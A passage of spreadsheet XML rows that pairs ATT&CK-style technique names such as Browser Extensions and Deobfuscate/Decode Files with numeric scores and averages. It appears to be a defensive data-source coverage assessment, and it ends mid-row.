    <row r="137" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A137" s="43" t="s">
        <v>246</v>
      </c>
      <c r="B137" s="41" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:B)</f>
        <v>Create Account</v>
      </c>
      <c r="C137" s="45" t="s">
        <v>1410</v>
      </c>
      <c r="D137" s="14">
        <v>4</v>
      </c>
      <c r="E137" s="14">
        <v>4</v>
      </c>
      <c r="F137" s="14">
        <v>5</v>
      </c>
      <c r="G137" s="32">
        <f t="shared" si="2"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A138" s="43" t="s">
        <v>248</v>
      </c>
      <c r="B138" s="41" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:B)</f>
        <v>Office Application Startup</v>
      </c>
      <c r="C138" s="45" t="s">
        <v>3068</v>
      </c>
      <c r="D138" s="14">
        <v>3</v>
      </c>
      <c r="E138" s="14">
        <v>4</v>
      </c>
      <c r="F138" s="14">
        <v>5</v>
      </c>
      <c r="G138" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A139" s="43" t="s">
        <v>249</v>
      </c>
      <c r="B139" s="41" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:B)</f>
        <v>Add-ins</v>
      </c>
      <c r="C139" s="45" t="s">
        <v>3069</v>
      </c>
      <c r="D139" s="14">
        <v>2</v>
      </c>
      <c r="E139" s="14">
        <v>4</v>
      </c>
      <c r="F139" s="14">
        <v>5</v>
      </c>
      <c r="G139" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A140" s="43" t="s">
        <v>250</v>
      </c>
      <c r="B140" s="41" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:B)</f>
        <v>Add-ins</v>
      </c>
      <c r="C140" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D140" s="14">
        <v>3</v>
      </c>
      <c r="E140" s="14">
        <v>4</v>
      </c>
      <c r="F140" s="14">
        <v>5</v>
      </c>
      <c r="G140" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A141" s="43" t="s">
        <v>251</v>
      </c>
      <c r="B141" s="41" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C141" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D141" s="14">
        <v>2</v>
      </c>
      <c r="E141" s="14">
        <v>3</v>
      </c>
      <c r="F141" s="14">
        <v>4</v>
      </c>
      <c r="G141" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A142" s="43" t="s">
        <v>253</v>
      </c>
      <c r="B142" s="41" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C142" s="45" t="s">
        <v>3070</v>
      </c>
      <c r="D142" s="14">
        <v>1</v>
      </c>
      <c r="E142" s="14">
        <v>3</v>
      </c>
      <c r="F142" s="14">
        <v>3</v>
      </c>
      <c r="G142" s="32">
        <f t="shared" si="2"/>
        <v>2.2000000000000002</v>
      </c>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A143" s="43" t="s">
        <v>254</v>
      </c>
      <c r="B143" s="41" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C143" s="45" t="s">
        <v>919</v>
      </c>
      <c r="D143" s="14">
        <v>2</v>
      </c>
      <c r="E143" s="14">
        <v>4</v>
      </c>
      <c r="F143" s="14">
        <v>5</v>
      </c>
      <c r="G143" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A144" s="43" t="s">
        <v>255</v>
      </c>
      <c r="B144" s="41" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C144" s="45" t="s">
        <v>3071</v>
      </c>
      <c r="D144" s="14">
        <v>2</v>
      </c>
      <c r="E144" s="14">
        <v>4</v>
      </c>
      <c r="F144" s="14">
        <v>4</v>
      </c>
      <c r="G144" s="32">
        <f t="shared" si="2"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A145" s="43" t="s">
        <v>256</v>
      </c>
      <c r="B145" s="41" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C145" s="45" t="s">
        <v>2085</v>
      </c>
      <c r="D145" s="14">
        <v>0</v>
      </c>
      <c r="E145" s="14">
        <v>1</v>
      </c>
      <c r="F145" s="14">
        <v>2</v>
      </c>
      <c r="G145" s="32">
        <f t="shared" si="2"/>
        <v>0.8</v>
      </c>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A146" s="43" t="s">
        <v>257</v>
      </c>
      <c r="B146" s="41" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C146" s="45" t="s">
        <v>16</v>
      </c>
      <c r="D146" s="14">
        <v>1</v>
      </c>
      <c r="E146" s="14">
        <v>3</v>
      </c>
      <c r="F146" s="14">
        <v>3</v>
      </c>
      <c r="G146" s="32">
        <f t="shared" si="2"/>
        <v>2.2000000000000002</v>
      </c>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A147" s="43" t="s">
        <v>258</v>
      </c>
      <c r="B147" s="41" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C147" s="45" t="s">
        <v>2218</v>
      </c>
      <c r="D147" s="14">
        <v>3</v>
      </c>
      <c r="E147" s="14">
        <v>4</v>
      </c>
      <c r="F147" s="14">
        <v>5</v>
      </c>
      <c r="G147" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A148" s="43" t="s">
        <v>260</v>
      </c>
      <c r="B148" s="41" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C148" s="45" t="s">
        <v>2218</v>
      </c>
      <c r="D148" s="14">
        <v>2</v>
      </c>
      <c r="E148" s="14">
        <v>3</v>
      </c>
      <c r="F148" s="14">
        <v>4</v>
      </c>
      <c r="G148" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A149" s="43" t="s">
        <v>261</v>
      </c>
      <c r="B149" s="41" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C149" s="45" t="s">
        <v>3072</v>
      </c>
      <c r="D149" s="14">
        <v>2</v>
      </c>
      <c r="E149" s="14">
        <v>3</v>
      </c>
      <c r="F149" s="14">
        <v>5</v>
      </c>
      <c r="G149" s="32">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A150" s="43" t="s">
        <v>262</v>
      </c>
      <c r="B150" s="41" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C150" s="45" t="s">
        <v>1462</v>
      </c>
      <c r="D150" s="14">
        <v>2</v>
      </c>
      <c r="E150" s="14">
        <v>3</v>
      </c>
      <c r="F150" s="14">
        <v>4</v>
      </c>
      <c r="G150" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A151" s="43" t="s">
        <v>263</v>
      </c>
      <c r="B151" s="41" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C151" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D151" s="14">
        <v>3</v>
      </c>
      <c r="E151" s="14">
        <v>4</v>
      </c>
      <c r="F151" s="14">
        <v>5</v>
      </c>
      <c r="G151" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A152" s="43" t="s">
        <v>264</v>
      </c>
      <c r="B152" s="41" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C152" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D152" s="14">
        <v>2</v>
      </c>
      <c r="E152" s="14">
        <v>4</v>
      </c>
      <c r="F152" s="14">
        <v>5</v>
      </c>
      <c r="G152" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A153" s="43" t="s">
        <v>265</v>
      </c>
      <c r="B153" s="41" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C153" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D153" s="14">
        <v>3</v>
      </c>
      <c r="E153" s="14">
        <v>4</v>
      </c>
      <c r="F153" s="14">
        <v>5</v>
      </c>
      <c r="G153" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A154" s="43" t="s">
        <v>266</v>
      </c>
      <c r="B154" s="41" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C154" s="45" t="s">
        <v>1023</v>
      </c>
      <c r="D154" s="14">
        <v>2</v>
      </c>
      <c r="E154" s="14">
        <v>4</v>
      </c>
      <c r="F154" s="14">
        <v>5</v>
      </c>
      <c r="G154" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A155" s="43" t="s">
        <v>267</v>
      </c>
      <c r="B155" s="41" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C155" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D155" s="14">
        <v>2</v>
      </c>
      <c r="E155" s="14">
        <v>3</v>
      </c>
      <c r="F155" s="14">
        <v>4</v>
      </c>
      <c r="G155" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A156" s="43" t="s">
        <v>268</v>
      </c>
      <c r="B156" s="41" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C156" s="45" t="s">
        <v>3073</v>
      </c>
      <c r="D156" s="14">
        <v>3</v>
      </c>
      <c r="E156" s="14">
        <v>4</v>
      </c>
      <c r="F156" s="14">
        <v>5</v>
      </c>
      <c r="G156" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A157" s="43" t="s">
        <v>269</v>
      </c>
      <c r="B157" s="41" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C157" s="45" t="s">
        <v>3074</v>
      </c>
      <c r="D157" s="14">
        <v>3</v>
      </c>
      <c r="E157" s="14">
        <v>4</v>
      </c>
      <c r="F157" s="14">
        <v>5</v>
      </c>
      <c r="G157" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A158" s="43" t="s">
        <v>270</v>
      </c>
      <c r="B158" s="41" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C158" s="45" t="s">
        <v>16</v>
      </c>
      <c r="D158" s="14">
        <v>1</v>
      </c>
      <c r="E158" s="14">
        <v>3</v>
      </c>
      <c r="F158" s="14">
        <v>4</v>
      </c>
      <c r="G158" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A159" s="43" t="s">
        <v>271</v>
      </c>
      <c r="B159" s="41" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C159" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D159" s="14">
        <v>2</v>
      </c>
      <c r="E159" s="14">
        <v>4</v>
      </c>
      <c r="F159" s="14">
        <v>5</v>
      </c>
      <c r="G159" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A160" s="43" t="s">
        <v>272</v>
      </c>
      <c r="B160" s="41" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C160" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D160" s="14">
        <v>2</v>
      </c>
      <c r="E160" s="14">
        <v>3</v>
      </c>
      <c r="F160" s="14">
        <v>4</v>
      </c>
      <c r="G160" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A161" s="43" t="s">
        <v>273</v>
      </c>
      <c r="B161" s="41" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C161" s="45" t="s">
        <v>791</v>
      </c>
      <c r="D161" s="14">
        <v>2</v>
      </c>
      <c r="E161" s="14">
        <v>3</v>
      </c>
      <c r="F161" s="14">
        <v>4</v>
      </c>
      <c r="G161" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A162" s="43" t="s">
        <v>274</v>
      </c>
      <c r="B162" s="41" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C162" s="45" t="s">
        <v>3075</v>
      </c>
      <c r="D162" s="14">
        <v>1</v>
      </c>
      <c r="E162" s="14">
        <v>3</v>
      </c>
      <c r="F162" s="14">
        <v>4</v>
      </c>
      <c r="G162" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A163" s="43" t="s">
        <v>275</v>
      </c>
      <c r="B163" s="41" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C163" s="45" t="s">
        <v>1873</v>
      </c>
      <c r="D163" s="14">
        <v>3</v>
      </c>
      <c r="E163" s="14">
        <v>4</v>
      </c>
      <c r="F163" s="14">
        <v>5</v>
      </c>
      <c r="G163" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A164" s="43" t="s">
        <v>276</v>
      </c>
      <c r="B164" s="41" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C164" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D164" s="14">
        <v>3</v>
      </c>
      <c r="E164" s="14">
        <v>4</v>
      </c>
      <c r="F164" s="14">
        <v>5</v>
      </c>
      <c r="G164" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A165" s="43" t="s">
        <v>277</v>
      </c>
      <c r="B165" s="41" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C165" s="45" t="s">
        <v>16</v>
      </c>
      <c r="D165" s="14">
        <v>0</v>
      </c>
      <c r="E165" s="14">
        <v>1</v>
      </c>
      <c r="F165" s="14">
        <v>3</v>
      </c>
      <c r="G165" s="32">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A166" s="43" t="s">
        <v>278</v>
      </c>
      <c r="B166" s="41" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C166" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D166" s="14">
        <v>3</v>
      </c>
      <c r="E166" s="14">
        <v>4</v>
      </c>
      <c r="F166" s="14">
        <v>5</v>
      </c>
      <c r="G166" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A167" s="43" t="s">
        <v>279</v>
      </c>
      <c r="B167" s="41" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C167" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D167" s="14">
        <v>1</v>
      </c>
      <c r="E167" s="14">
        <v>3</v>
      </c>
      <c r="F167" s="14">
        <v>4</v>
      </c>
      <c r="G167" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A168" s="43" t="s">
        <v>280</v>
      </c>
      <c r="B168" s="41" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C168" s="45" t="s">
        <v>589</v>
      </c>
      <c r="D168" s="14">
        <v>0</v>
      </c>
      <c r="E168" s="14">
        <v>2</v>
      </c>
      <c r="F168" s="14">
        <v>4</v>
      </c>
      <c r="G168" s="32">
        <f t="shared" si="2"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A169" s="43" t="s">
        <v>281</v>
      </c>
      <c r="B169" s="41" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C169" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D169" s="14">
        <v>3</v>
      </c>
      <c r="E169" s="14">
        <v>4</v>
      </c>
      <c r="F169" s="14">
        <v>5</v>
      </c>
      <c r="G169" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A170" s="43" t="s">
        <v>282</v>
      </c>
      <c r="B170" s="41" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C170" s="45" t="s">
        <v>16</v>
      </c>
      <c r="D170" s="14">
        <v>3</v>
      </c>
      <c r="E170" s="14">
        <v>4</v>
      </c>
      <c r="F170" s="14">
        <v>5</v>
      </c>
      <c r="G170" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A171" s="43" t="s">
        <v>283</v>
      </c>
      <c r="B171" s="41" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C171" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D171" s="14">
        <v>3</v>
      </c>
      <c r="E171" s="14">
        <v>4</v>
      </c>
      <c r="F171" s="14">
        <v>5</v>
      </c>
      <c r="G171" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A172" s="43" t="s">
        <v>284</v>
      </c>
      <c r="B172" s="41" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C172" s="45" t="s">
        <v>2233</v>
      </c>
      <c r="D172" s="14">
        <v>2</v>
      </c>
      <c r="E172" s="14">
        <v>3</v>
      </c>
      <c r="F172" s="14">
        <v>4</v>
      </c>
      <c r="G172" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A173" s="43" t="s">
        <v>285</v>
      </c>
      <c r="B173" s="41" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C173" s="45" t="s">
        <v>1199</v>
      </c>
      <c r="D173" s="14">
        <v>1</v>
      </c>
      <c r="E173" s="14">
        <v>3</v>
      </c>
      <c r="F173" s="14">
        <v>4</v>
      </c>
      <c r="G173" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A174" s="43" t="s">
        <v>286</v>
      </c>
      <c r="B174" s="41" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C174" s="45" t="s">
        <v>3076</v>
      </c>
      <c r="D174" s="14">
        <v>2</v>
      </c>
      <c r="E174" s="14">
        <v>4</v>
      </c>
      <c r="F174" s="14">
        <v>5</v>
      </c>
      <c r="G174" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A175" s="43" t="s">
        <v>287</v>
      </c>
      <c r="B175" s="41" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C175" s="45" t="s">
        <v>3077</v>
      </c>
      <c r="D175" s="14">
        <v>1</v>
      </c>
      <c r="E175" s="14">
        <v>3</v>
      </c>
      <c r="F175" s="14">
        <v>4</v>
      </c>
      <c r="G175" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A176" s="43" t="s">
        <v>288</v>
      </c>
      <c r="B176" s="41" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:B)</f>
        <v>Component Object Model and Distributed COM</v>
      </c>
      <c r="C176" s="45" t="s">
        <v>1470</v>
      </c>
      <c r="D176" s="14">
        <v>3</v>
      </c>
      <c r="E176" s="14">
        <v>4</v>
      </c>
      <c r="F176" s="14">
        <v>5</v>
      </c>
      <c r="G176" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A177" s="43" t="s">
        <v>290</v>
      </c>
      <c r="B177" s="41" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C177" s="45" t="s">
        <v>3078</v>
      </c>
      <c r="D177" s="14">
        <v>2</v>
      </c>
      <c r="E177" s="14">
        <v>3</v>
      </c>
      <c r="F177" s="14">
        <v>5</v>
      </c>
      <c r="G177" s="32">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A178" s="43" t="s">
        <v>292</v>
      </c>
      <c r="B178" s="41" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C178" s="45" t="s">
        <v>3079</v>
      </c>
      <c r="D178" s="14">
        <v>3</v>
      </c>
      <c r="E178" s="14">
        <v>4</v>
      </c>
      <c r="F178" s="14">
        <v>5</v>
      </c>
      <c r="G178" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A179" s="43" t="s">
        <v>294</v>
      </c>
      <c r="B179" s="41" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C179" s="45" t="s">
        <v>3080</v>
      </c>
      <c r="D179" s="14">
        <v>2</v>
      </c>
      <c r="E179" s="14">
        <v>3</v>
      </c>
      <c r="F179" s="14">
        <v>5</v>
      </c>
      <c r="G179" s="32">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A180" s="43" t="s">
        <v>295</v>
      </c>
      <c r="B180" s="41" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C180" s="45" t="s">
        <v>3081</v>
      </c>
      <c r="D180" s="14">
        <v>1</v>
      </c>
      <c r="E180" s="14">
        <v>3</v>
      </c>
      <c r="F180" s="14">
        <v>4</v>
      </c>
      <c r="G180" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A181" s="43" t="s">
        <v>297</v>
      </c>
      <c r="B181" s="41" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C181" s="45" t="s">
        <v>3068</v>
      </c>
      <c r="D181" s="14">
        <v>2</v>
      </c>
      <c r="E181" s="14">
        <v>4</v>
      </c>
      <c r="F181" s="14">
        <v>5</v>
      </c>
      <c r="G181" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A182" s="43" t="s">
        <v>298</v>
      </c>
      <c r="B182" s="41" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C182" s="45" t="s">
        <v>3060</v>
      </c>
      <c r="D182" s="14">
        <v>0</v>
      </c>
      <c r="E182" s="14">
        <v>3</v>
      </c>
      <c r="F182" s="14">
        <v>4</v>
      </c>
      <c r="G182" s="32">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A183" s="43" t="s">
        <v>299</v>
      </c>
      <c r="B183" s="41" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C183" s="45" t="s">
        <v>3058</v>
      </c>
      <c r="D183" s="14">
        <v>2</v>
      </c>
      <c r="E183" s="14">
        <v>3</v>
      </c>
      <c r="F183" s="14">
        <v>4</v>
      </c>
      <c r="G183" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A184" s="43" t="s">
        <v>300</v>
      </c>
      <c r="B184" s="41" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C184" s="45" t="s">
        <v>3082</v>
      </c>
      <c r="D184" s="14">
        <v>1</v>
      </c>
      <c r="E184" s="14">
        <v>3</v>
      </c>
      <c r="F184" s="14">
        <v>4</v>
      </c>
      <c r="G184" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A185" s="43" t="s">
        <v>301</v>
      </c>
      <c r="B185" s="41" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C185" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D185" s="14">
        <v>2</v>
      </c>
      <c r="E185" s="14">
        <v>4</v>
      </c>
      <c r="F185" s="14">
        <v>5</v>
      </c>
      <c r="G185" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A186" s="43" t="s">
        <v>302</v>
      </c>
      <c r="B186" s="41" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
      <c r="C186" s="45" t="s">
        <v>1479</v>
      </c>
      <c r="D186" s="14">
        <v>2</v>
      </c>
      <c r="E186" s="14">
        <v>3</v>
      </c>
      <c r="F186" s="14">
        <v>4</v>
      </c>
      <c r="G186" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A187" s="43" t="s">
        <v>304</v>
      </c>
      <c r="B187" s="41" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
      <c r="C187" s="45" t="s">
        <v>3060</v>
      </c>
      <c r="D187" s="14">
        <v>2</v>
      </c>
      <c r="E187" s="14">
        <v>4</v>
      </c>
      <c r="F187" s="14">
        <v>5</v>
      </c>
      <c r="G187" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A188" s="43" t="s">
        <v>305</v>
      </c>
      <c r="B188" s="41" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
